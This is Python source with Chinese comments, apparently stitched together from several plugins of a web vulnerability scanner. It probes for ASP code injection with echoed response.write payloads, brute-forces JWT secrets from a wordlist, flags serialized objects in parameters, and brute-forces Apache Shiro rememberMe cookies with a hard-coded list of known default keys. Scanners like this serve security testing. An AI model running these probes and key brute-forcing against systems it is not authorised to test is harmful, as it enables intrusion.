def audit(self):
if WEB_PLATFORM.ASP not in self.response.programing and conf.level < 2:
return
randint1 = random.randint(10000, 90000)
randint2 = random.randint(10000, 90000)
randint3 = randint1 * randint2
_payloads = [
'response.write({}*{})'.format(randint1, randint2),
'\'+response.write({}*{})+\''.format(randint1, randint2),
'"response.write({}*{})+"'.format(randint1, randint2),
]
# 载入处理位置以及原始payload
iterdatas = self.generateItemdatas()
# 根据原始payload和位置组合新的payload
for origin_dict, positon in iterdatas:
payloads = self.paramsCombination(origin_dict, positon, _payloads)
for key, value, new_value, payload in payloads:
r = self.req(positon, payload)
if not r:
continue
html = r.text
if str(randint3) in html:
result = ResultObject(self)
result.init_info(self.requests.url, "发现asp代码注入",
VulType.CMD_INNJECTION)
result.add_detail(
"payload探测", r.reqinfo, generateResponse(r),
"探测payload:{},并发现回显数字{}".format(new_value, randint3),
key, payload, positon)
self.success(result)
return True
def fuzz_secret(self, contents, sig, headDict, v):
secret_list = []
for secret in open(os.path.join(path.data, "jwt_secret.txt"), encoding='utf-8'):
secret = secret.replace("\n", "")
secret_list.append(secret)
for secret in secret_list:
if testKey(secret.encode(), sig, contents, headDict):
result = ResultObject(self)
text_result = "猜解出jwt:{}的secret为:{}, ".format(v, secret)
result.init_info(self.requests.url, text_result, VulType.SENSITIVE)
result.add_detail("猜解jwt的secret", "", "",
"猜解出jwt:{}的secret为:{}, ".format(v, secret), "", "", "")
self.success(result)
def _check(self, k, v):
whats = None
if isJavaObjectDeserialization(v):
whats = "JavaObjectDeserialization"
elif isPHPObjectDeserialization(v):
whats = "PHPObjectDeserialization"
elif isPythonObjectDeserialization(v):
whats = "PythonObjectDeserialization"
if whats:
result = ResultObject(self)
text_result = "发现{}反序列化参数".format(whats)
result.init_info(self.requests.url, text_result, VulType.BASELINE)
result.add_detail("原始请求", self.requests.raw, self.response.raw,
"参数{}发现为{}的反序列化结果".format(k, whats), k, v,
self.requests.method)
self.success(result)
def _check_key(self):
keys = [
'kPH+bIxk5D2deZiIxcaaaA==',
'4AvVhmFLUs0KTA3Kprsdag==',
'WkhBTkdYSUFPSEVJX0NBVA==',
'RVZBTk5JR0hUTFlfV0FPVQ==',
'U3ByaW5nQmxhZGUAAAAAAA==',
'cGljYXMAAAAAAAAAAAAAAA==',
'd2ViUmVtZW1iZXJNZUtleQ==',
'fsHspZw/92PrS3XrPW+vxw==',
'sHdIjUN6tzhl8xZMG3ULCQ==',
'WuB+y2gcHRnY2Lg9+Aqmqg==',
'ertVhmFLUs0KTA3Kprsdag==',
'2itfW92XazYRi5ltW0M2yA==',
'6ZmI6I2j3Y+R1aSn5BOlAA==',
'f/SY5TIve5WWzT4aQlABJA==',
'Jt3C93kMR9D5e8QzwfsiMw==',
'aU1pcmFjbGVpTWlyYWNsZQ==',
]
for key in keys:
payload = self.generator_payload(key)
reqHeader = self.requests.headers
if "Cookie" not in reqHeader:
reqHeader["Cookie"] = ""
_cookie = paramToDict(reqHeader["Cookie"], place=PLACE.COOKIE)
_cookie["rememberMe"] = payload
reqHeader["Cookie"] = url_dict2str(_cookie, PLACE.COOKIE)
req = None
if self.requests.method == HTTPMETHOD.GET:
req = requests.get(self.requests.url, headers=reqHeader)
elif self.requests.method == HTTPMETHOD.POST:
req = requests.post(self.requests.url,
data=self.requests.post_data,
headers=reqHeader)
if req and "deleteMe" not in req.headers.get('Set-Cookie', ''):
result = ResultObject(self)
result.init_info(self.requests.url, "Shiro Key发现",
VulType.CMD_INNJECTION)
result.add_detail("payload探测", req.reqinfo,
generateResponse(req),
"Cookie中rememberMe可以被反序列化", "rememberMe",
payload, PLACE.COOKIE)
self.success(result)
return True
return False
def audit(self):
respHeader = self.response.headers
isShiro = False
if "deleteMe" in respHeader.get('Set-Cookie', ''):
isShiro = True
result = ResultObject(self)
result.init_info(self.requests.url, "Shiro框架发现", VulType.BASELINE)
result.add_detail("payload探测", self.requests.raw,
self.response.raw, "在返回的cookie中发现了deleteMe标记",
"", "", PLACE.GET)
self.success(result)
if WEB_PLATFORM.JAVA not in self.response.programing and conf.level < 2 and not isShiro:
return
if not isShiro:
# 如果不是shiro框架,检测一下
reqHeader = self.requests.headers
if "Cookie" not in reqHeader:
reqHeader["Cookie"] = ""
_cookie = paramToDict(reqHeader["Cookie"], place=PLACE.COOKIE)
_cookie["rememberMe"] = "2"
reqHeader["Cookie"] = url_dict2str(_cookie, PLACE.COOKIE)
req = None
if self.requests.method == HTTPMETHOD.GET:
req = requests.get(self.requests.url, headers=reqHeader)
elif self.requests.method == HTTPMETHOD.POST:
req = requests.post(self.requests.url,
data=self.requests.post_data,
headers=reqHeader)
if req and "deleteMe" in req.headers.get('Set-Cookie', ''):
isShiro = True
result = ResultObject(self)
result.init_info(self.requests.url, "Shiro框架发现",
VulType.BASELINE)
result.add_detail(
"payload探测", req.reqinfo, generateResponse(req),
"在cookie中加入rememberMe=1,在返回cookie发现了deleteMe标记,可尝试爆破shiro的key",
"", "", PLACE.GET)
self.success(result)
# 爆破
if isShiro:
self._check_key()